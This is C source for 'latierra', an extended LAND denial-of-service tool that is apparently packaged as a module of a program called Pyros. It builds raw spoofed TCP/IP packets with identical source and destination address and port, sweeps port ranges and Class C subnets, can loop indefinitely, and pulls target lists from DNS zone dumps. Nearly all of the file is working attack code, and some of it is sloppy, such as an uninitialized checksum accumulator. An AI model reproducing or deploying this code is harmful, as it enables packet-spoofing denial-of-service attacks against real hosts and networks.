/*
* Atrix Team 1994, 2001 - http://www.atrix.cjb.net
* Original Code by MondoMan
* Modified by SeCToR-X 03/01/2001
*
* File modified for Pyros 1.5
*/


#define DEFAULT_FREQUENCY		1 
#define TRUE	 					1
#define FALSE   					0
#define FOR_EVER 					-5
#define LIST_FILE  				1
#define ZONE_FILE  				2
#define MAXLINELENGTH 			512
#define DEFAULT_SEQ				0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8

struct pseudohdr1
	{
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr1 tcpheader1;
	};

typedef struct latierra_data
	{
	char dest_ip[256];
	int  tcp_flags;
	int  window_size;
	int  ip_protocol;
	int  sequence_number;
	int  ttl;
	int  supress_output;
        int  message_type;
	} LATIERRA_DATA;

void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);

int platierra(char *targetip, char *tflag, int msgt, int prtt, int lloop, int bp, int ep)
{
	FILE *fp;
	LATIERRA_DATA ld;
	int frequency = DEFAULT_FREQUENCY, x;
	int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
	int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
	char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];

	printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
   printf("Enhanced version of land.c originally developed by m3lt, FLC\n");

	strcpy(valid_tcp_flags, "fsrpau");
	ld.tcp_flags = 0;
	ld.window_size = DEFAULT_WINSIZE;
	ld.ip_protocol = IP_TCP;
	ld.sequence_number = DEFAULT_SEQ;
	ld.ttl = DEFAULT_TTL;
	ld.message_type = 0;
       
        switch(tflag[0]) {
 	case 'f':                        /* fin */
	ld.tcp_flags |= TH_FIN;
	break;
	case 's':                        /* syn */
	ld.tcp_flags |= TH_SYN;
        break;
	case 'r':                        /* reset */
	ld.tcp_flags |= TH_RST;
	break;
	case 'p':                        /* push */
	ld.tcp_flags |= TH_PUSH;			
	break;
	case 'a':                        /* ack */
	ld.tcp_flags |= TH_ACK;
	break;
	case 'u':                        /* urgent */
	ld.tcp_flags |= TH_URG;
	break;
	default:
	printf("\nERROR: Invalid option specified\n");
	break;
	}
      
        ld.message_type = msgt;
	ld.ip_protocol  = prtt;
	strcpy(ld.dest_ip, targetip);
	got_ip = TRUE;
	loop = lloop;
	beginning_port = bp;
	ending_port = ep;

	printf("\nSettings:\n\n");

	printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
	printf("  (-e)   Ending Port #   : %d\n",     ending_port );
	printf("  (-s)   Seconds to Pause: %d\n",     frequency );
	printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
	printf("  (-w)   Window size     : %d\n",     ld.window_size );
	printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
	printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
	printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
	printf("  (-t)   TCP flags       : "); 

	strcpy(buff, "");

	if( ld.tcp_flags & TH_FIN)
		strcat(buff, "fin ");
	if( ld.tcp_flags & TH_SYN)
		strcat(buff, "syn ");
	if(ld.tcp_flags & TH_RST)
		strcat(buff, "rst ");
	if(ld.tcp_flags & TH_PUSH)
		strcat(buff, "push ");
	if(ld.tcp_flags & TH_ACK)
		strcat(buff, "ack ");
	if(ld.tcp_flags & TH_URG)
		strcat(buff, "urg ");

	printf("%s\n\n", buff);
			
	if(ending_port < beginning_port)
		{
		printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
		return(-8);
		}
	
	scan_loop = loop_val = loop;
	
	if(use_file)
		{
		if(access(filename, 0))
			{
			printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
			return(-9);
			}

		if( (fp = fopen(filename, "rt")) == NULL)
			{
			printf("ERROR: Unable to open %s.\n", filename);
			return(-10);
			}

		if(!get_ip(use_file, fp, buff))
			{
			printf("Unable to get any IP address from file %s.\n");
			return(-11);
			}

		strcpy(ld.dest_ip, buff);
		}
	
	while( (loop == FOR_EVER) ? 1 : loop-- > 0)
		{
		for(i=beginning_port; i <= ending_port; i++)
			{
			if(land(&ld, i))        /* go for it BaBy! */
				break;

   		if(frequency)          /* make sure freq > 0 */
			 	{
				if(!ld.supress_output)
					printf("-> paused %d seconds.\n", frequency);
				sleep(frequency);
				}
			}

		if( (!use_file) && (loop && increment_addr) )
			{
			char temp_addr[21];

			if(++octet > 254)                        /* check for reset */
				{
				if(loop_val != FOR_EVER)              /* make sure not to distrute forever! */
					{
					if(++scan_loop > loop_val)        /* check if scanned x times */
						break;
					else
						loop = loop_val;                /* restore original value */
					}
				octet = 1;	                          /* reset */
				}

			sprintf(temp_addr, "%s%d", class_c_addr, octet);
			strcpy(ld.dest_ip, temp_addr);
		
			if(!ld.supress_output)
				printf("** incrementing to next IP address: %s\n", ld.dest_ip);

			if(scan_loop > loop_val)
				break;	/* break while loop */
			}
		else if(use_file)
			{
			if(!get_ip(use_file, fp, buff))
				break;
		
			loop++;

			strcpy(ld.dest_ip, buff);
			}

		} /* end while */

	printf("\nDone.\n\n");
} /* end main */

int  get_ip(int use_file, FILE *fp, char *buff)
{
	if(use_file == LIST_FILE)
		return(get_ip_from_list(fp, buff));
		
	return(get_ip_from_zone(fp, buff));
}

int get_ip_from_list(FILE *fp, char *buff)
{
	int ret_val;

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '['))
				{
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

int get_ip_from_zone(FILE *fp, char *buff)
{
	int ret_val, i;
	char *p, delim[8];

	strcpy(delim, " \t");

	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);

		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;

		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
				{
				if( (p = strtok( buff, delim)) == NULL)
					continue;

				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				if(strcmp(p, "A"))   /* be sure second column is an DNS A record */
					continue;
				
				if( (p = strtok(NULL, delim)) == NULL)
					continue;

				strcpy(buff, p);

				/* verify that we have a valid IP address to work with */

				if(inet_addr(p) == -1)
					continue;

				/* strip off training line characters */
				
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}

	return 0;
}

/************/
/* checksum */
/************/
u_short lchecksum(u_short * data,u_short length)
{
	register long value;
	u_short i;

	for(i = 0; i< (length >> 1); i++)
		value += data[i];

	if((length & 1)==1)
		value += (data[i] << 8);

	value = (value & 0xFFFF) + (value >> 16);

	return(~value);
}

/********/
/* land */
/********/
int land(LATIERRA_DATA *ld,  int port_number)
{
	struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader1 = (struct iphdr *) buffer;
   struct tcphdr1 * tcpheader1=(struct tcphdr1 *) (buffer+sizeof(struct iphdr));
   struct pseudohdr1 pseudoheader1;

	bzero(&sin,sizeof(struct sockaddr_in));

   sin.sin_family=AF_INET;

   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
   	{
      printf("ERROR: unknown host %s\n", ld->dest_ip);
      return(-1);
      }

	if((sin.sin_port=htons(port_number))==0)
  		{
      printf("ERROR: unknown port %s\n",port_number);
      return(-2);
      }

	if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
   	{
      printf("ERROR: couldn't allocate raw socket\n");
      return(-3);
      }

	bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr1));

   ipheader1->version=4;
   ipheader1->ihl=sizeof(struct iphdr)/4;
   ipheader1->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr1));
   ipheader1->id=htons(ld->sequence_number);
   ipheader1->ttl = ld->ttl;
   ipheader1->protocol = ld->ip_protocol;
   ipheader1->saddr=sin.sin_addr.s_addr;
   ipheader1->daddr=sin.sin_addr.s_addr;

   tcpheader1->th_sport = sin.sin_port;
   tcpheader1->th_dport = sin.sin_port;
   tcpheader1->th_seq = htonl(ld->sequence_number);
   tcpheader1->th_flags = ld->tcp_flags;
   tcpheader1->th_off = sizeof(struct tcphdr1)/4;
   tcpheader1->th_win = htons(ld->window_size);

   bzero(&pseudoheader1,12+sizeof(struct tcphdr1));

   pseudoheader1.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader1.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader1.protocol = ld->ip_protocol;
   pseudoheader1.length = htons(sizeof(struct tcphdr1));
   bcopy((char *) tcpheader1,(char *) &pseudoheader1.tcpheader1,sizeof(struct tcphdr1));
   tcpheader1->th_sum = lchecksum((u_short *) &pseudoheader1,12+sizeof(struct tcphdr1));

   if( sendto(sock, 	buffer, 
							sizeof(struct iphdr)+sizeof(struct tcphdr1),
							ld->message_type,
							(struct sockaddr *) &sin,
							sizeof(struct sockaddr_in) )==-1)
   	{
      printf("ERROR: can't send packet. (sendto failed)\n");
      return(-4);
      }

	if(!ld->supress_output)
		printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);

   close(sock);

   return(0);
}
/* End of land */

void alternatives()
{
	printf("\nAlternative command line arguments for option -i\n\n");

	printf("    You can create two types of files that latierra can use to get\n");
	printf("    a list of IP addresses, a simple ASCII file with each IP address\n");
	printf("    appearing on each line or better yet, a DNS zone file created by\n");
	printf("    nslookup.  If you are unfamiliar with nslookup, specify a '-n' on the\n");
	printf("    command line of latierra.\n\n");
	printf("    Basically, latierra will walk down the list and send the spoofed packet\n");
	printf("    to each IP address.  Once the list is complete, and loop > 1, the list\n");
 	printf("    is repeated.   To specify that the '-i' option should use a zone file,\n");
	printf("    specify \"zone=filename.txt\" instead of an IP address.  To specify a \n");
	printf("    simple ASCII list of IP addresses, use \"list=filename.txt\".  Lines\n");
	printf("    beginning with ';' or '[' are ignored.  Lines that are not an 'A' \n");
	printf("    record (second column)in a zone file will ignored.\n\n");

	exit(-1);
}

void nslookup_help()
{
	printf("\nNSLOOKUP help\n\n");
	

	printf("To see who is the DNS server for a particular domain, issue the following:\n");
	printf("        > set type=ns\n");
	printf("        > xyz.com\n\n");
	printf("  You will see a list of the name server(s) if completed successfully\n\n");

	printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
	printf("and issue the following commands:\n");
	printf("         > server 1.1.1.1\n");
	printf("         > ls -d xyz.com > filename.txt\n\n");

	printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
	printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); 

	exit(-1);
}

void protocol_list()
{
	printf("\nProtocol List:\n\n");	
	printf("Verified:\n");
	printf("1-ICMP   2-IGMP   3-GGP  5-ST   6-TCP   7-UCL   8-EGP   9-IGP  10-BBN_RCC_MON\n");
	printf("11-NVP11   13-ARGUS   14-EMCON   15-XNET   16-CHAOS   17-UDP   18-MUX\n");
	printf("19-DCN_MEAS   20-HMP   21-PRM   22-XNS_IDP   23-TRUNK1   24-TRUNK2\n");
	printf("25-LEAF1   26-LEAF2    27-RDP   28-IRTP      29-ISO_TP4  30-NETBLT\n");
	printf("31-MFE_NSP   32-MERIT_INP   33-SEP   34-3PC   62-CFTP    64-SAT_EXPAK\n");
	printf("66-RVD       67-IPPC        69-SAT_MON   70-VISA         71-IPCV\n");
	printf("76-BR_SAT_MON   77-SUN_ND   78-WB_MON   79-WB_EXPAK   80-ISO_IP\n");
	printf("81-VMTP   82-SECURE_VMTP   83-VINES  84-TTP   85-NSFNET_IGP   86-DGP\n");
	printf("87-TCF    88-IGRP          89-OSPFIGP         90-SPRITE_RPG   91-LARP\n\n");
	printf("Supported:\n");
	printf("    6-TCP     17-UDP    (future: PPTP, SKIP) \n\n");

	exit(-1);
}

void print_arguments()
{
	printf("Arguments: \n");
	printf("     *   -i dest_ip = destination ip address such as 1.1.1.1\n");
	printf("                If last octet is '-', then the address will increment\n");
	printf("                from 1 to 254 (Class C) on the next loop\n");
	printf("                and loop must be > 1 or %d (forever).\n", FOR_EVER);
	printf("                Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
	printf("                For list of alternative options, use  -a instead of -h.\n");
	printf("     *   -b port# = beginning port number (required).\n");
        printf("         -e port# = ending port number (optional)\n");
	printf("         -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
	printf("         -v = time_to_live value, default=%d\n", DEFAULT_TTL);
	printf("         -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
	printf("         -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
	printf("         -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
	printf("         -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
	printf("         -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
	printf("         -o 1 = supress additional output to screen, default=0\n" );
	printf("         -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
	printf("     * = required     ~ = default parameter values\n\n");
	exit(-1);
}
/* End of file */


